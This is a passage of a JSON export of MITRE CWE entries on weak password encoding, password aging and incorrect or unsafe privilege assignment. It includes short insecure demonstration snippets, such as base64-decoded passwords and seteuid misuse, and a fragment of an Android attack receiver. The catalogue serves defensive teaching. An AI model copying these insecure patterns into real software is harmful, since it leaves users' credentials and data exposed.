Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"261":{"attr":{"@_ID":"261","@_Name":"Weak Encoding for Password","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Obscuring a password with a trivial encoding does not protect the password.","Extended_Description":"Password management issues occur when a password is stored in plaintext in an application\'s properties or configuration file. A programmer can attempt to remedy the password management problem by obscuring the password with an encoding function, such as base 64 encoding, but this effort does not adequately protect the password.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"326","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":{"Description":"Passwords should be encrypted with keys that are at least 128 bits in length for adequate security."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code reads a password from a properties file and uses the password to connect to a database.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...Properties prop = new Properties();prop.load(new FileInputStream(\\"config.properties\\"));String password = Base64.decode(prop.getProperty(\\"password\\"));DriverManager.getConnection(url, usr, password);...","xhtml:br":["","","","",""]}},"Body_Text":"This code will run successfully, but anyone with access to config.properties can read the value of password and easily determine that the value has been base 64 encoded. If a devious employee has access to this information, they can use it to break into the system."},{"Intro_Text":"The following code reads a password from the registry and uses the password to create a new network credential.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"...string value = regKey.GetValue(passKey).ToString();byte[] decVal = Convert.FromBase64String(value);NetworkCredential netCred = newNetworkCredential(username,decVal.toString(),domain);...","xhtml:br":["","","",""]}},"Body_Text":"This code will run successfully, but anyone who has access to the registry key used to store the password can read the value of password. If a devious employee has access to this information, they can use it to break into the system."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Password Management: Weak Cryptography"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A8","Entry_Name":"Insecure Storage","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"55"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-207"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 19: Use of Weak Password-Based Systems." Page 279"}}]},"Notes":{"Note":{"attr":{"@_Type":"Other"},"xhtml:p":"The \\"crypt\\" family of functions uses weak cryptographic algorithms and should be avoided. It may be present in some projects for compatibility."}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Other_Notes, References, Relationships, Type"}],"Previous_Entry_Name":{"#text":"Weak Cryptography for Passwords","attr":{"@_Date":"2020-02-24"}}}},"262":{"attr":{"@_ID":"262","@_Name":"Not Using Password Aging","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"If no mechanism is in place for managing password aging, users will have no incentive to update passwords in a timely manner.","Extended_Description":"Security experts have often recommended that users change their passwords regularly and avoid reusing passwords. Although this can be an effective mitigation, if the expiration window is too short, it can cause users to generate poor or predictable passwords. As such, it is important to discourage creating similar passwords. It is also useful to have a password aging mechanism that notifies users when passwords are considered old and requests that they replace them with new, strong passwords. Companion documentation which stresses how important this practice is can help users understand and better support this approach.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"309","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"263","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"324","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"As passwords age, the probability that they are compromised grows."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"As part of a product\'s design, require users to change their passwords regularly and avoid reusing previous passwords."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A system does not enforce the changing of passwords every certain period."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Not allowing password aging"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"16"}},{"attr":{"@_CAPEC_ID":"49"}},{"attr":{"@_CAPEC_ID":"509"}},{"attr":{"@_CAPEC_ID":"55"}},{"attr":{"@_CAPEC_ID":"555"}},{"attr":{"@_CAPEC_ID":"560"}},{"attr":{"@_CAPEC_ID":"561"}},{"attr":{"@_CAPEC_ID":"565"}},{"attr":{"@_CAPEC_ID":"600"}},{"attr":{"@_CAPEC_ID":"652"}},{"attr":{"@_CAPEC_ID":"653"}},{"attr":{"@_CAPEC_ID":"70"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 19: Use of Weak Password-Based Systems." Page 279"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Demonstrative_Examples, Description, Potential_Mitigations, References, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Not Allowing Password Aging","attr":{"@_Date":"2008-04-11"}}}},"263":{"attr":{"@_ID":"263","@_Name":"Password Aging with Long Expiration","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Allowing password aging to occur unchecked can result in the possibility of diminished password integrity.","Extended_Description":"Just as neglecting to include functionality for the management of password aging is dangerous, so is allowing password aging to continue unchecked. Passwords must be given a maximum life span, after which a user is required to update with a new and different password.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"As passwords age, the probability that they are compromised grows."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Ensure that password aging is limited so that there is a defined maximum age for passwords and so that the user is notified several times leading up to the password expiration."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A system requires the changing of passwords every five years."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Allowing password aging"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"16"}},{"attr":{"@_CAPEC_ID":"49"}},{"attr":{"@_CAPEC_ID":"509"}},{"attr":{"@_CAPEC_ID":"55"}},{"attr":{"@_CAPEC_ID":"555"}},{"attr":{"@_CAPEC_ID":"560"}},{"attr":{"@_CAPEC_ID":"561"}},{"attr":{"@_CAPEC_ID":"565"}},{"attr":{"@_CAPEC_ID":"600"}},{"attr":{"@_CAPEC_ID":"652"}},{"attr":{"@_CAPEC_ID":"653"}},{"attr":{"@_CAPEC_ID":"70"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 19: Use of Weak Password-Based Systems." Page 279"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Allowing Unchecked Password Aging","attr":{"@_Date":"2008-04-11"}}}},"266":{"attr":{"@_ID":"266","@_Name":"Incorrect Privilege Assignment","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A product incorrectly assigns a privilege to a particular actor, creating an unintended sphere of control for that actor.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"269","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"286","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"A user can access restricted functionality and/or sensitive information that may include administrative functionality and user accounts."}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-97"},"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"seteuid(0);seteuid(getuid());","xhtml:br":["","",""],"xhtml:i":"/* do some stuff */"}}},{"attr":{"@_Demonstrative_Example_ID":"DX-142"},"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"AccessController.doPrivileged(new PrivilegedAction() {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public Object run() {}","xhtml:div":{"#text":"System.loadLibrary(\\"awt\\");return null;","attr":{"@_style":"margin-left:10px;"},"xhtml:i":["// privileged code goes here, for example:","// nothing to return"],"xhtml:br":["","","",""]}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-108"},"Intro_Text":"This application sends a special intent with a flag that allows the receiving application to read a data file for backup purposes.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Intent intent = new Intent();intent.setAction(\\"com.example.BackupUserData\\");intent.setData(file_uri);intent.addFlags(FLAG_GRANT_READ_URI_PERMISSION);sendBroadcast(intent);","xhtml:br":["","","",""]}},{"attr":{"@_Nature":"attack","@_Language":"Java"},"xhtml:div":{"#text":"public class CallReceiver extends BroadcastReceiver {}","xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"Uri userData = intent.getData();stealUserData(userData);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}],"Body_Text":"Any malicious application can register to receive this intent. Because of the FLAG_GRANT_READ_URI_PERMISSION included with the intent, the malicious receiver code can read the user\'s data."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1193","Description":"untrusted user placed in unix \\"wheel\\" group","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1193"},{"Reference":"CVE-2005-2741","Description":"Product allows users to grant themselves certain rights that can be used to escalate privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2741"},{"Reference":"CVE-2005-2496","Description":"Product uses group ID of a user instead of the group, causing it to run with different privileges. This is resultant from some other unknown issue.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2496"},{"Reference":"CVE-2004-0274","Description":"Product mistakenly assigns a particular status to an entity, leading to increased privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0274"}]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Incorrect Privilege Assignment"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC00-J","Entry_Name":"Do not allow privileged blocks to leak sensitive information across a trust boundary"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC01-J","Entry_Name":"Do not allow tainted variables in privileged blocks"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-76"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"267":{"attr":{"@_ID":"267","@_Name":"Privilege Defined With Unsafe Actions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A particular privilege, role, capability, or right can be used to perform unsafe actions that were not intended, even when it is assigned to the correct entity.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"269","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"A user can access restricted functionality and/or sensitive information that may include administrative functionality and user accounts."}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-127"},"Intro_Text":"This code intends to allow only Administrators to print debug information about a system.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public enum Roles {}public void printDebugInfo(User requestingUser){}","xhtml:div":[{"#text":"ADMIN,USER,GUEST","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(isAuthenticated(requestingUser)){}else{}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"switch(requestingUser.role){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case GUEST:default:","xhtml:div":[{"#text":"System.out.println(\\"You are not authorized to perform this command\\");break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.out.println(currentDebugState());break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":""}}}},{"#text":"System.out.println(\\"You must be logged in to perform this command\\");","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}],"xhtml:br":["",""]}},"Body_Text":"While the intention was to only allow Administrators to print the debug information, the code as written only excludes those with the role of \\"GUEST\\". Someone with the role of \\"ADMIN\\" or \\"USER\\" will be allowed access, which goes against the original intent. An attacker may be able to use this debug information to craft an attack on the system."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1981","Description":"Roles have access to dangerous procedures (Accessible entities).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1981"},{"Reference":"CVE-2002-1671","Description":"Untrusted object/method gets access to clipboard (Accessible entities).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1671"},{"Reference":"CVE-2004-2204","Description":"Gain privileges using functions/tags that should be restricted (Accessible entities).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2204"},{"Reference":"CVE-2000-0315","Description":"Traceroute program allows unprivileged users to modify source address of packet (Accessible entities).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0315"},{"Reference":"CVE-2004-0380","Description":"Bypass domain restrictions using a particular file that references unsafe URI schemes (Accessible entities).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0380"},{"Reference":"CVE-2002-1154","Description":"Script does not restrict access to an update command, leading to resultant disk consumption and filled error logs (Accessible entities).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1154"},{"Reference":"CVE-2002-1145","Description":"\\"public\\" database user can use stored procedure to modify data controlled by the database owner (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1145"},{"Reference":"CVE-2000-0506","Description":"User with capability can prevent setuid program from dropping privileges (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0506"},{"Reference":"CVE-2002-2042","Description":"Allows attachment to and modification of privileged processes (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2042"},{"Reference":"CVE-2000-1212","Description":"User with privilege can edit raw underlying object using unprotected method (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1212"},{"Reference":"CVE-2005-1742","Description":"Inappropriate actions allowed by a particular role(Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1742"},{"Reference":"CVE-2001-1480","Description":"Untrusted entity allowed to access the system clipboard (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1480"},{"Reference":"CVE-2001-1551","Description":"Extra Linux capability allows bypass of system-specified restriction (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1551"},{"Reference":"CVE-2001-1166","Description":"User with debugging rights can read entire process (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1166"},{"Reference":"CVE-2005-1816","Description":"Non-root admins can add themselves or others to the root admin group (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1816"},{"Reference":"CVE-2005-2173","Description":"Users can change certain properties of objects to perform otherwise unauthorized actions (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2173"},{"Reference":"CVE-2005-2027","Description":"Certain debugging commands not restricted to just the administrator, allowing registry modification and infoleak (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2027"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unsafe Privilege"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"58"}},{"attr":{"@_CAPEC_ID":"634"}},{"attr":{"@_CAPEC_ID":"637"}},{"attr":{"@_CAPEC_ID":"643"}},{"attr":{"@_CAPEC_ID":"648"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-76"}}},"Notes":{"Note":{"attr":{"@_Type":"Maintenance"},"xhtml:p":"Note: there are 2 separate sub-categories here:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["- privilege incorrectly allows entities to perform certain actions","- object is incorrectly accessible to entities with a given privilege"]}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Maintenance_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}],"Previous_Entry_Name":{"#text":"Unsafe Privilege","attr":{"@_Date":"2008-04-11"}}}},"268":{"attr":{"@_ID":"268","@_Name":"Privilege Chaining","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Two distinct privileges, roles, capabilities, or rights can be combined in a way that allows an entity to perform unsafe actions that would not be allowed without that 